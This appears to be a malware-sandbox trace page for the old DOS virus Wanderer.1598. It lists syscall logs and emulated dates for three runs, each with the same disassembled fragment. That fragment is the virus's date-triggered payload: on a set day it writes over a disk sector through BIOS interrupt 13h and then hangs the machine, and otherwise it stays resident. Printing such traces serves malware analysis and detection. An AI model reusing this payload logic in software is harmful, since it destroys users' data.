Sample viewer

vx.netlux.org/Virus.DOS.KOV.Wanderer.1598


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:42:03.562824316Z 240 PC: 13e2b | UNKNOWN!
2018-12-17T22:42:03.574281578Z 255 PC: 13e5f | UNKNOWN!
2018-12-17T22:42:03.575529463Z 74 PC: 12f42 | Reallocate memory
2018-12-17T22:42:03.577261204Z 75 PC: 12fa8 | Execute program
2018-12-17T22:42:03.593772416Z 9 PC: 13302 | Display string (String= 'Goat file (EXE). Size=000011A0h/0000004512d bytes. ')
2018-12-17T22:42:03.59833858Z 76 PC: 13306 | Terminate with return code (Return code = '36')
2018-12-17T22:42:03.600793101Z 73 PC: 12fae | Release memory
2018-12-17T22:42:03.601755202Z 77 PC: 12fb2 | Get program return code
2018-12-17T22:42:03.602878811Z 42 PC: 12fb6 | Get date
0x12fb6: cmp al, 6
0x12fb8: je 0x12fc2
0x12fba: mov ah, 0x31
0x12fbc: mov dx, 0x7e
0x12fbf: call 0x22b09
0x12fc2: mov ah, 0x19
0x12fc4: int 0x21
0x12fc6: mov dl, al
0x12fc8: cmp dl, 2
0x12fcb: jb 0x12fcf
0x12fcd: add al, 0x7e
0x12fcf: mov ah, 3
0x12fd1: mov al, 9
0x12fd3: mov bx, 0x6ae
0x12fd6: mov cx, 1
0x12fd9: mov dh, 0
0x12fdb: int 0x13
0x12fdd: nop
0x12fde: nop
0x12fdf: jmp 0x12fdd
2018-12-17T22:42:03.60430036Z 49 PC: 12b0f | Terminate and stay resident (Return code = '1' | Memory size = '126')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7430,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:41.3254422Z 240 PC: 13e2b | UNKNOWN!
2018-12-25T12:01:41.326787523Z 255 PC: 13e5f | UNKNOWN!
2018-12-25T12:01:41.327948006Z 74 PC: 12f42 | Reallocate memory
2018-12-25T12:01:41.32900785Z 75 PC: 12fa8 | Execute program
2018-12-25T12:01:41.338974255Z 9 PC: 13302 | Display string (String= 'Goat file (EXE). Size=000011A0h/0000004512d bytes. ')
2018-12-25T12:01:41.342181077Z 76 PC: 13306 | Terminate with return code (Return code = '36')
2018-12-25T12:01:41.344125636Z 73 PC: 12fae | Release memory
2018-12-25T12:01:41.345685527Z 77 PC: 12fb2 | Get program return code
2018-12-25T12:01:41.346874894Z 42 PC: 12fb6 | Get date
0x12fb6: cmp al, 6
0x12fb8: je 0x12fc2
0x12fba: mov ah, 0x31
0x12fbc: mov dx, 0x7e
0x12fbf: call 0x22b09
0x12fc2: mov ah, 0x19
0x12fc4: int 0x21
0x12fc6: mov dl, al
0x12fc8: cmp dl, 2
0x12fcb: jb 0x12fcf
0x12fcd: add al, 0x7e
0x12fcf: mov ah, 3
0x12fd1: mov al, 9
0x12fd3: mov bx, 0x6ae
0x12fd6: mov cx, 1
0x12fd9: mov dh, 0
0x12fdb: int 0x13
0x12fdd: nop
0x12fde: nop
0x12fdf: jmp 0x12fdd
2018-12-25T12:01:41.349090393Z 49 PC: 12b0f | Terminate and stay resident (Return code = '2' | Memory size = '126')

{"DateBased":true,"Day":5,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7430,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:41.392621829Z 240 PC: 13e2b | UNKNOWN!
2018-12-25T12:01:41.393843787Z 255 PC: 13e5f | UNKNOWN!
2018-12-25T12:01:41.396182721Z 74 PC: 12f42 | Reallocate memory
2018-12-25T12:01:41.397891692Z 75 PC: 12fa8 | Execute program
2018-12-25T12:01:41.413093625Z 9 PC: 13302 | Display string (String= 'Goat file (EXE). Size=000011A0h/0000004512d bytes. ')
2018-12-25T12:01:41.41863792Z 76 PC: 13306 | Terminate with return code (Return code = '36')
2018-12-25T12:01:41.421437606Z 73 PC: 12fae | Release memory
2018-12-25T12:01:41.423060191Z 77 PC: 12fb2 | Get program return code
2018-12-25T12:01:41.424141193Z 42 PC: 12fb6 | Get date
0x12fb6: cmp al, 6
0x12fb8: je 0x12fc2
0x12fba: mov ah, 0x31
0x12fbc: mov dx, 0x7e
0x12fbf: call 0x22b09
0x12fc2: mov ah, 0x19
0x12fc4: int 0x21
0x12fc6: mov dl, al
0x12fc8: cmp dl, 2
0x12fcb: jb 0x12fcf
0x12fcd: add al, 0x7e
0x12fcf: mov ah, 3
0x12fd1: mov al, 9
0x12fd3: mov bx, 0x6ae
0x12fd6: mov cx, 1
0x12fd9: mov dh, 0
0x12fdb: int 0x13
0x12fdd: nop
0x12fde: nop
0x12fdf: jmp 0x12fdd
2018-12-25T12:01:41.426179038Z 25 PC: 12fc6 | Get default drive